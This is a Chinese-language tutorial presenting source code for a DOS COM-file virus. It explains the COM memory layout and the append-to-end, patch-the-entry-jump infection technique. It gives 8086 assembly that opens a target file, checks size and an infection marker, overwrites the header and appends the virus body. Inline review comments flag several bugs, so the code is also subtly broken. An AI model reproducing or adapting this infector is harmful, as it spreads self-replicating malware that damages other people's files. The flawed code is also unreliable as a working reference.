
感染com病毒源码

COM文件是纯粹的代码映象(没有文件头,整个文件被原样装入段内偏移0100h处),加载后在内存中的映象如下:
CS=DS=ES=SS
CS:0000  -> +----------+
            |   PSP    |
IP(0100) -> +----------+
            | COM FILE |
SP(FFFE) -> +----------+
            | dw 0000  |
            +----------+
因此COM文件的最大SIZE为 64K - 100h(PSP) - 1 word(栈顶压入的一个字 0000) bytes,即 0FEFEh 字节.
感染COM的典型做法如下:
; Schematic of the classic "append to end-of-file and patch the entry jmp" COM infector.
; After infection the host's first 3 bytes are replaced by a near jmp (opcode 0E9h, rel16)
; to the virus body appended at end-of-file; the body restores those bytes and jumps back
; to 0100h so the host runs normally. CS=DS in a COM image, so [100] below is the entry.
cs:0100 jmp endoffile ;db 0e9h -- near jmp, 3 bytes, patched over the host's first 3 bytes
;dw size of com file -- rel16 displacement of that jmp. NOTE(review): a rel16 is relative to
; the byte after the 3-byte jmp, so landing exactly on virusstart needs (size - 3) -- verify
...
endoffile:
virusstart:
virus code
; Restore the 3 saved host bytes at CS:0100 before returning control to the host.
mov ax,orgcode ; first two saved bytes (word)
mov [100],ax
mov al,[orgcode+2] ; third saved byte
mov [102],al
virussize=$-virusstart ; bytes from virusstart to here; the resume jmp and orgcode are NOT counted
resume:
jmp 100 ;db 0e9h -- near jmp back to the restored host entry point
;dw -(sizeofcom+virussize) -- NOTE(review): the displacement is relative to resume+3, so this
; expression omits the jmp's own 3 bytes -- verify against the assembled output
orgcode db 3 dup (?) ;the host's original 3 bytes from 0100h (the 4-byte variant described below needs 4 here)
感染文件时,先将文件开始的三个字节保存在orgcode中,然后把这三个字节改为 0E9H,SIZEOFCOMFILE(即 jmp 到文件末尾的病毒体).
将resume开始的三字节改为 0E9H,-(sizeofcom+virussize)(即 jmp 回 0100h),然后将病毒写入com文件的末尾.
(是不是很简单^_^).
完整的感染代码还需要有已感染的判断,和文件大小的判断.如下:

假设DS:DX指向文件名;VirusSize、VirusStart的定义如上,并作以下的修改:
改为保存开始的四个字节,并用
db 90h,0E9h ; nop ; jmp near -- read back as the little-endian word 0E990h, which doubles as the infection marker
dw sizeofcom ; rel16 displacement of the jmp (the routine below stores sizeofcom+VirusSize here)
替换(即 nop; jmp xxxx),并以文件开头的字 0E990h(字节序列 90h,0E9h)作为已感染标记.
...
; Infection routine. Entry: DS:DX -> ASCIIZ name of the candidate COM file.
; Uses INT 21h handle functions: 3Dh open, 42h lseek, 3Fh read, 40h write.
; Skips files >= 64K, files too large to hold the body, files < 4 bytes, and files
; already carrying the 0E990h marker at offset 0.
; NOTE(review): the stack is not balanced within this span (push dx below has no
; matching pop) -- whatever follows ErrorOpen: must account for it.
mov ax,3d01h ; AH=3Dh open; AL=01h is write-only access. NOTE(review): the comment says r/w and
             ; the read below needs read access; read/write is AL=02h -- verify intent
int 21h ;open for r/w
jc OpenError ; NOTE(review): the label defined at the end of this routine is spelled ErrorOpen
push dx ; filename pointer (never popped within this span)
xchg ax,bx ; bx = file handle
mov ax,4202h ; lseek(handle, 0, SEEK_END): file size returned in dx:ax
xor cx,cx
xor dx,dx
int 21h ;seek to end
or dx,dx
jnz complete ;file larger than 64k,donot infect
cmp ax,0FEEEh-VirusSize-11 ; 11 = trailing bytes appended after VirusSize (see the final write)
jnb complete ;com file too large for infect

cmp ax,4
jb complete ;file less than 4 bytes,donot infected

mov di,offset orgcode ; di -> 4-byte save area; the replacement header is taken from orgcode+4 below
mov [di+6],ax ; word at orgcode+6 = host size ...
add [di+6],VirusSize ; ... + VirusSize = rel16 stored in the dw slot of the header at orgcode+4

mov ax,4200h ; lseek(handle, 0, SEEK_SET)
xor cx,cx
xor dx,dx
int 21h ;seek to begin

mov cx,4
mov dx,di ; buffer = orgcode
mov ah,3fh
int 21h ;read 4 bytes -- the host's original header, kept for restoration at run time

jc complete
cmp word ptr [di],0E990h ; little-endian bytes 90h,0E9h = nop; jmp -> already infected
;if has been infected,should be
;nop
;jmp XXXX
jz complete
mov cx,4
add dx,cx ; dx = orgcode+4 = the replacement header (90h,0E9h,dw)
mov ah,40h
int 21h ;write 4 byte to the beginning
; NOTE(review): the file pointer sits at offset 4 after the read above and no seek precedes
; this write, so as written the header is not placed at offset 0 -- verify

mov ax,4202h
xor cx,cx
xor dx,dx
int 21h ;seek to end

mov ah,40h
mov dx,VirusStart ; NOTE(review): in MASM this loads the word AT VirusStart unless VirusStart is a constant; offset VirusStart may be intended
mov cx,VirusSize+11 ; body plus 11 trailing bytes -- presumably orgcode(4) + header(4) + resume jmp(3); layout not shown here
int 21h ;write Virus Code to COM
complete:
mov ah,3fh ; NOTE(review): AH=3Fh is read, not close (3Eh) -- the comment says close; verify
int 21h ;close file
ErrorOpen:
